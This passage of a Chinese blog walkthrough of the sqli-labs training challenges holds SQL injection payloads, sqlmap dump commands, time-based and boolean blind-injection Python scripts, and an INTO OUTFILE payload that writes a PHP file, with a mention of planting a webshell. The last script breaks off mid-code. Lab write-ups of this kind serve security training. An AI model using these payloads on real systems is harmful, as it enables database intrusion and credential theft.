<p><img src="https://note.youdao.com/yws/api/personal/file/WEB48a8f30bc2e6894e0e9376a6e042de84?method=download&shareKey=d03e84b8f348b04aa158b409b91cdccd" alt="Less-1"></p>
</li>
</ol>
<p>3 .爆”security”数据库下的”users”表的列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=1&quot; -D security -T users --columns</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBff95a80ad774e3d25fbaa4a43ac041d9?method=download&shareKey=d405b4b249f1cc9c038db812f28816cd" alt="Less-1"></p>
<ol start="4">
<li>爆”users”表下的字段<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=1&quot; -D security -T users -C id,username,password --dump</span><br></pre></td></tr></table></figure>
<img src="https://note.youdao.com/yws/api/personal/file/WEB8e78df006d8d54dd5e56ec453b785ac8?method=download&shareKey=5d4ded92387022c7dcc6b1553eb3526f" alt="Less-1"></li>
</ol>
<hr>
<h3 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h3><p>不用添加引号或注释符，直接添加语句，构造查询语句Less-1一样</p>
<hr>
<h3 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h3><p>构造如下语句进行闭合，构造查询语句Less-1一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://ab7c5a88-3e07-4be3-8faf-0153da702337.node4.buuoj.cn/Less-3/?id=1&#x27;)--+</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h3><p>构造如下语句进行闭合，构造查询语句Less-1一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://ab7c5a88-3e07-4be3-8faf-0153da702337.node4.buuoj.cn/Less-3/?id=1&quot;)--+</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h3><p><img src="https://note.youdao.com/yws/api/personal/file/WEB5d5a9e4bd9d1e6c89d47bf887328fcfa?method=download&shareKey=965ff2b8f48409b6fb9cafda89979027" alt="Less-5"><br>通过构造如下语句，可以闭合进行注入，但不会正常回显，所以通过报错注入进行查询</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://a01286c0-36aa-42b5-85f7-ed3ebad204fd.node4.buuoj.cn/Less-5/?id=1&#x27;--+</span><br></pre></td></tr></table></figure>
<h4 id="直接注入"><a href="#直接注入" class="headerlink" title="直接注入"></a>直接注入</h4><ol>
<li><p>通过order by 发现有三列</p>
</li>
<li><p>爆库<br>由于用group_concat会显示不下(group_concat()函数最大长度为64位)，所以通过 <strong>limit n,1</strong> 来输出数据,通过改变n的值来显示所有的数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://a01286c0-36aa-42b5-85f7-ed3ebad204fd.node4.buuoj.cn/Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((select concat(schema_name) from information_schema.schemata limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBe6bf89e3b4bd4135aac13fb58dfe21cc?method=download&shareKey=b3625143114ff1e380c64e95377a5fb6" alt="Less-5"><br><img src="https://note.youdao.com/yws/api/personal/file/WEB3af87eac871fd9f291f2ea5b33bde81d?method=download&shareKey=0a2e162b37a491e9d47be039f32f09f5" alt="Less-5"><br><img src="https://note.youdao.com/yws/api/personal/file/WEB396fe52f61cfbd519c2a2c90a27d771b?method=download&shareKey=dd0cadfc74c680f745007fe0c75a9153" alt="Less-5"><br><img src="https://note.youdao.com/yws/api/personal/file/WEBcf4d8e2751eb58f13897c12e82625104?method=download&shareKey=c06ad4d1769429961565386ce24d4d49" alt="Less-5"><br><img src="https://note.youdao.com/yws/api/personal/file/WEBed24153dae05a8d9f089e60942e27282?method=download&shareKey=9ca0ee00dff3bb7bfb2687b1bcdeaf8d" alt="Less-5"><br><img src="https://note.youdao.com/yws/api/personal/file/WEB78c1e3ffd2e333d7e047301f1e2bf85b?method=download&shareKey=1efa4d15642f7ebe1c93a30baca3c52b" alt="Less-5"></p>
</li>
<li><p>爆’security’库下的表<br>同样的方法爆表，通过 <strong>limit n,1</strong> 改变n的值来显示所有的表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://a01286c0-36aa-42b5-85f7-ed3ebad204fd.node4.buuoj.cn/Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27; limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure></li>
<li><p>爆’security’库下’users’表下的列<br>同样的方法爆表，通过 <strong>limit n,1</strong> 改变n的值来显示所有的列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://a01286c0-36aa-42b5-85f7-ed3ebad204fd.node4.buuoj.cn/Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((select concat(column_name) from information_schema.columns where table_schema=&#x27;security&#x27; and table_name=&#x27;users&#x27; limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure></li>
<li><p>爆’security’库下’users’表下的字段<br>同样的方法爆表，通过 <strong>limit n,1</strong> 改变n的值来显示所有的列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://a01286c0-36aa-42b5-85f7-ed3ebad204fd.node4.buuoj.cn/Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((select concat(username,&#x27;:&#x27;,password) from security.users limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure></li>
</ol>
<h4 id="编写脚本注入"><a href="#编写脚本注入" class="headerlink" title="编写脚本注入"></a>编写脚本注入</h4><p>（脚本执行结果可能会有偏差，多执行几遍，主要是编写脚本的思路和方法）</p>
<ol>
<li>时间盲注<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">import string</span><br><span class="line">import requests</span><br><span class="line">from tqdm import tqdm</span><br><span class="line"></span><br><span class="line">def request(request_id):</span><br><span class="line">    try:</span><br><span class="line">        requests.get(&quot;http://9696fcfd-7854-40d9-b0af-507286c91977.node4.buuoj.cn/Less-5/?id=&#123;&#125;&quot;.format(request_id),</span><br><span class="line">                     timeout=3)</span><br><span class="line">    except:</span><br><span class="line">        return True</span><br><span class="line">    return False</span><br><span class="line"></span><br><span class="line">sql = &quot;select database()&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_SCHEMA) from information_schema.tables&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_NAME) from information_schema.tables where TABLE_SCHEMA = &#x27;security&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct COLUMN_NAME) from information_schema.columns where TABLE_SCHEMA =&#x27;security&#x27; and TABLE_NAME=&#x27;users&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct username,&#x27;:&#x27;,password) from security.users&quot;</span><br><span class="line"></span><br><span class="line">out_len_sql = &quot;1&#x27; and if(length((&#123;&#125;))=&#123;&#125;,sleep(5),1)--+&quot;</span><br><span class="line">out_sql = &quot;1&#x27; and if(substring((&#123;&#125;),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;,sleep(5),1)--+&quot;</span><br><span class="line"></span><br><span class="line">length = 1</span><br><span class="line">while True:</span><br><span class="line">    if request(out_len_sql.format(sql, length)):</span><br><span class="line">        break</span><br><span class="line">    length += 1</span><br><span class="line">print(&quot;长度：&#123;&#125;&quot;.format(length))</span><br><span class="line"></span><br><span class="line">result = &quot;&quot;</span><br><span class="line">for i in tqdm(range(1, length + 1)):</span><br><span class="line">    for j in string.printable:</span><br><span class="line">        if request(out_sql.format(sql, i, j)):</span><br><span class="line">            result += j</span><br><span class="line">            break</span><br><span class="line"></span><br><span class="line">print(&quot;结果：&#123;&#125;&quot;.format(result))</span><br></pre></td></tr></table></figure></li>
<li>二分法<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">from tqdm import tqdm</span><br><span class="line"></span><br><span class="line">def request(request_id):</span><br><span class="line">    try:</span><br><span class="line">        r = requests.get(&quot;http://9696fcfd-7854-40d9-b0af-507286c91977.node4.buuoj.cn/Less-5/?id=&#123;&#125;&quot;.format(request_id))</span><br><span class="line">        time.sleep(0.5)</span><br><span class="line">        if &quot;You&quot; in r.text:</span><br><span class="line">            return True</span><br><span class="line">    except:</span><br><span class="line">        return False</span><br><span class="line">    return False</span><br><span class="line"></span><br><span class="line">sql = &quot;select database()&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_SCHEMA) from information_schema.tables&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_NAME) from information_schema.tables where TABLE_SCHEMA = &#x27;security&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct COLUMN_NAME) from information_schema.columns where TABLE_SCHEMA =&#x27;security&#x27; and TABLE_NAME=&#x27;users&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct username.password) from security.users&quot;</span><br><span class="line"></span><br><span class="line">out_len_sql = &quot;1&#x27; and length((&#123;&#125;))=&#123;&#125;--+&quot;</span><br><span class="line">out_sql = &quot;1&#x27; and substr((&#123;&#125;),&#123;&#125;,1)&gt;&#x27;&#123;&#125;&#x27;--+&quot;</span><br><span class="line"></span><br><span class="line">length = 1</span><br><span class="line">while True:</span><br><span class="line">    if request(out_len_sql.format(sql, length)):</span><br><span class="line">        break</span><br><span class="line">    length += 1</span><br><span class="line">print(&quot;长度：&#123;&#125;&quot;.format(length))</span><br><span class="line"></span><br><span class="line">result = &quot;&quot;</span><br><span class="line">for i in tqdm(range(1, length + 1)):</span><br><span class="line">    low = 32</span><br><span class="line">    high = 126</span><br><span class="line">    while (low &lt; high):</span><br><span class="line">        mid = (low + high) // 2</span><br><span class="line">        if request(out_sql.format(sql, i, chr(mid))):</span><br><span class="line">            low = mid + 1</span><br><span class="line">        else:</span><br><span class="line">            high = mid</span><br><span class="line">    result += chr(low)</span><br><span class="line"></span><br><span class="line">print(&quot;结果：&#123;&#125;&quot;.format(result.lower()))</span><br></pre></td></tr></table></figure></li>
</ol>
<hr>
<h3 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h3><p>构造如下语句进行闭合，构造查询语句Less-5一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://9696fcfd-7854-40d9-b0af-507286c91977.node4.buuoj.cn/Less-6/?id=1&quot;--+</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h3><p>根据题目提示<strong>You are in…. Use outfile……</strong> 通过<strong>into outfile</strong> 把一句话写入文件<br>能使用这个方法前提是<br>1.root 权限<br>2.知晓文件绝对路径<br>3.写入的路径存在写入权限<br>4.secure_file_priv 允许向对应位置写入<br>所以在本地搭环境，对其的配置进行相应的修改。<br>构造如下语句进行闭合</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.32.137:8888/Less-7/?id=1&#x27;))--+</span><br></pre></td></tr></table></figure>
<p>把一句话来写入文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.32.137:8888/Less-7/?id=1&#x27;))union select 1,2,&#x27;&lt;?php phpinfo();?&gt;&#x27; into outfile &quot;/var/www/html/Less-7/php_info.php&quot;--+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBb12d84d820c43a3c460061f5152116ba?method=download&shareKey=3dc5c85f2d4994656be393b797ca6bfe" alt="Less-7"><br>通过访问发现文件成功写入，也可以写入一句话木马，用蚁剑连接<br>也可以使用盲注</p>
<hr>
<h3 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h3><p>构造如下语句进行闭合，用盲注进行注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://cf6b4809-433f-4c4a-b2ba-585f9e36fe56.node4.buuoj.cn/Less-8/?id=1&#x27;--+</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h3><p>无论是单引号还是双引号闭合，页面回显是一样的<br>根据题目用单引号进行闭合，用时间盲注进行注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://bbd45ede-8ffd-4049-acb8-0ee2a4cd83df.node4.buuoj.cn/Less-9/?id=1&#x27;--+</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h3><p>跟Less-9，页面回显是一样的<br>根据题目用双引号进行闭合，用时间盲注进行注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://bbd45ede-8ffd-4049-acb8-0ee2a4cd83df.node4.buuoj.cn/Less-10/?id=1&quot;--+</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h3><h4 id="一般注入"><a href="#一般注入" class="headerlink" title="一般注入"></a>一般注入</h4><p>是post提交数据进行注入，查询语句与Less-1类似。要注意的是查询时只有两列，不是三列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27;order by 3#</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB28db885b746b7da711126ccfcf51b721?method=download&shareKey=031d5cc725ee92930581147769dd6ed6" alt="Less-11"></p>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><ol>
<li>爆所有库<br>updatexml一次只能显示32个字符，没有显示完全的可以通过mid来显示剩下的字符</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27; or updatexml(0,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),1,30)),0x7e),1)#</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBb8cd58c431594b8391abebe595043775?method=download&shareKey=b0b8d7f450628f733224e183bc8ef61b" alt="Less-11"><br>2. 爆表  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27; or updatexml(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB5c9b271573eedc4b8c23a5ded43c95f3?method=download&shareKey=15f0d990caec7e7c278badc704fed939" alt="Less-11">  </p>
<ol start="3">
<li>爆列名  </li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27; or updatexml(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=&#x27;security&#x27; and table_name=&#x27;users&#x27;),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB6ae0d639c0f1b5d7ac236ec8893a7026?method=download&shareKey=37f4ae5f1f1f885fe0caf731024a07c3" alt="Less-11">  </p>
<ol start="4">
<li>爆字段  </li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27; or updatexml(0,concat(0x7e,mid((select group_concat(username,&#x27;:&#x27;,password) from security.users),1,30),0x7e),1)#</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB3df45b0d957f198a20436e41a47872b7?method=download&shareKey=917bd8322c126858b2d0d9cc0086e334" alt="Less-11"></p>
<hr>
<h3 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h3><h4 id="一般注入-1"><a href="#一般注入-1" class="headerlink" title="一般注入"></a>一般注入</h4><p>跟Less-11一样，是post提交数据进行注入，查询语句与Less-1类似。查询时只有两列，闭合语句如下（用双引号，括号，注释符进行闭合）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot;)order by 2#</span><br></pre></td></tr></table></figure>

<h4 id="报错注入-1"><a href="#报错注入-1" class="headerlink" title="报错注入"></a>报错注入</h4><ol>
<li>爆所有库<br>一次性显示不下，用limit依次显示</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot;) or extractvalue(0,concat(0x7e,(select concat(schema_name) from information_schema.schemata limit 0,1),0x7e))#  </span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB855ae09fcbfca3ad0f2e7f5a2bde9a7e?method=download&shareKey=4561eb26f8692edaae2f8ddce98b807f" alt="Less-12"></p>
<ol start="2">
<li>爆表  </li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot;) or extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;),0x7e))#  </span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB73ad8e9ff0db606cbdcc64afa7aa2e08?method=download&shareKey=d7846bb60474fef215f18c67b4ac0f21" alt="Less-12"></p>
<ol start="3">
<li>爆列名  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot;) or extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=&#x27;security&#x27; and table_name =&#x27;users&#x27; ),0x7e))#  </span><br></pre></td></tr></table></figure></li>
</ol>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB93feb1792fe2d01cc6622644cc045174?method=download&shareKey=4dc6529f0933f0a4ef956ec7bf0c01c1" alt="Less-12"></p>
<ol start="4">
<li>爆字段<br>用limit分段显示<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot;) or extractvalue(0,concat(0x7e,(select concat(username,&#x27;:&#x27;,password) from security.users limit 0,1),0x7e))#  </span><br></pre></td></tr></table></figure></li>
</ol>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBc42af1f755757b0699ad99ef3d5676f7?method=download&shareKey=47d1ebf04db80b6bf5bbb4bfdff93f1b" alt="Less-12"></p>
<hr>
<h3 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h3><p>构造如下语句进行闭合，构造查询语句跟Less-11一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27;)#</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h3><p>构造如下语句进行闭合，构造查询语句跟Less-11一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&quot;#</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h3><p>使用脚本进行盲注，脚本注入速度较慢，有一定的错误，需要多尝试几次<br><strong>1. 时间盲注</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">import string</span><br><span class="line">import requests</span><br><span class="line">import datetime</span><br><span class="line">from tqdm import tqdm</span><br><span class="line"></span><br><span class="line">def request(data):</span><br><span class="line">    try:</span><br><span class="line">        requests.post(&quot;http://da91b82f-53d8-462e-b676-289439e88fdf.node4.buuoj.cn/Less-15/&quot;,data=data,</span><br><span class="line">                     timeout=3)</span><br><span class="line">    except:</span><br><span class="line">        return True</span><br><span class="line">    return False</span><br><span class="line"></span><br><span class="line">#查询的语句</span><br><span class="line">sql = &quot;select database()&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_SCHEMA) from information_schema.tables&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_NAME) from information_schema.tables where TABLE_SCHEMA = &#x27;security&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct COLUMN_NAME) from information_schema.columns where TABLE_SCHEMA =&#x27;security&#x27; and TABLE_NAME=&#x27;users&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct username,&#x27;:&#x27;,password) from security.users&quot;</span><br><span class="line"></span><br><span class="line">out_len_sql = &quot;admin&#x27; and if(length((&#123;&#125;))=&#123;&#125;,sleep(5),1)#&quot;</span><br><span class="line">out_sql = &quot;admin&#x27; and if(substring((&#123;&#125;),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;,sleep(5),1)#&quot;</span><br><span class="line"></span><br><span class="line"># 获取结果长度</span><br><span class="line">length = 1</span><br><span class="line">while True:</span><br><span class="line">    data = &#123;&quot;uname&quot;: &quot;%s&quot; % out_len_sql.format(sql, length), &quot;passwd&quot;: &quot;admin&quot;, &quot;submit&quot;: &quot;Submit&quot;&#125;</span><br><span class="line">    if (request(data)):</span><br><span class="line">        break</span><br><span class="line">    length += 1</span><br><span class="line">print(&quot;长度：&#123;&#125;&quot;.format(length))</span><br><span class="line"></span><br><span class="line">result = &quot;&quot;</span><br><span class="line">for i in tqdm(range(1, length + 1)):</span><br><span class="line">    for j in string.printable:</span><br><span class="line">        data = &#123;&quot;uname&quot;: &quot;%s&quot; % out_sql.format(sql, i, j), &quot;passwd&quot;: &quot;admin&quot;, &quot;submit&quot;: &quot;Submit&quot;&#125;</span><br><span class="line">        if request(data):</span><br><span class="line">            result += j</span><br><span class="line">            break</span><br><span class="line"></span><br><span class="line">print(&quot;结果：&#123;&#125;&quot;.format(result))</span><br></pre></td></tr></table></figure>

<p><strong>2. 二分法</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">import string</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">from tqdm import tqdm</span><br><span class="line"></span><br><span class="line">def request(data):</span><br><span class="line">    try:</span><br><span class="line">        r = requests.post(&quot;http://da91b82f-53d8-462e-b676-289439e88fdf.node4.buuoj.cn/Less-15/&quot;, data=data)</span><br><span class="line">        time.sleep(0.5)</span><br><span class="line">        if &#x27;flag&#x27; in r.text:</span><br><span class="line">            return True</span><br><span class="line">    except:</span><br><span class="line">        return True</span><br><span class="line">    return False</span><br><span class="line">#查询的语句</span><br><span class="line"># sql = &quot;select @@basedir&quot;</span><br><span class="line">sql = &quot;select database()&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct SCHEMA_NAME) from information_schema.schemata&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct TABLE_NAME) from information_schema.tables where TABLE_SCHEMA = &#x27;security&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct COLUMN_NAME) from information_schema.columns where TABLE_SCHEMA =&#x27;security&#x27; and TABLE_NAME=&#x27;users&#x27;&quot;</span><br><span class="line"># sql = &quot;select group_concat(distinct username,password) from security.users&quot;</span><br><span class="line"></span><br><span class="line">out_len_sql = &quot;admin&#x27; and length((&#123;&#125;))=&#123;&#125;#&quot;</span><br><span class="line">out_sql = &quot;admin&#x27; and substr((&#123;&#125;),&#123;&#125;,1)&gt;&#x27;&#123;&#125;&#x27;#&quot;</span><br><span class="line"></span><br><span class="line"># 获取结果长度</span><br><span class="line">length = 1</span><br><span class="line">while True:</span><br><span class="line">    data = &#123;&quot;uname&quot;: &quot;%s&quot; % out_len_sql.format(sql, length), &quot;passwd&quot;: &quot;admin&quot;, &quot;submit&quot;: &quot;Submit&quot;&#125;</span><br><span class="line">    if (request(data)):</span><br><span class="line">        break</span><br><span class="line">    length += 1</span><br><span class="line">print(&quot;长度：&#123;&#125;&quot;.format(length))</span><br><span class="line"></span><br><span class="line">result = &quot;&quot;</span><br><span class="line">for i in tqdm(range(1, length + 1)):</span><br><span class="line">    low = 32</span><br><span class="line">    high = 126</span><br><span class="line">    while (low &lt; high):</span><br><span class="line">        mid = (low + high) // 2</span><br><span class="line">        data = &#123;&quot;uname&quot;: &quot;%s&quot; % out_sql.format(sql, i, chr(mid)), &quot;passwd&quot;: &quot;admin&quot;, &quot;submit&quot;: &quot;Submit&quot;&#125;</span><br><span class="line">        if request(data):</span><br><span class="line">            low = mid + 1</span><br><span class="line">        else:</span><br><span class="line">            high = mid</span><br><span class="line">    result += 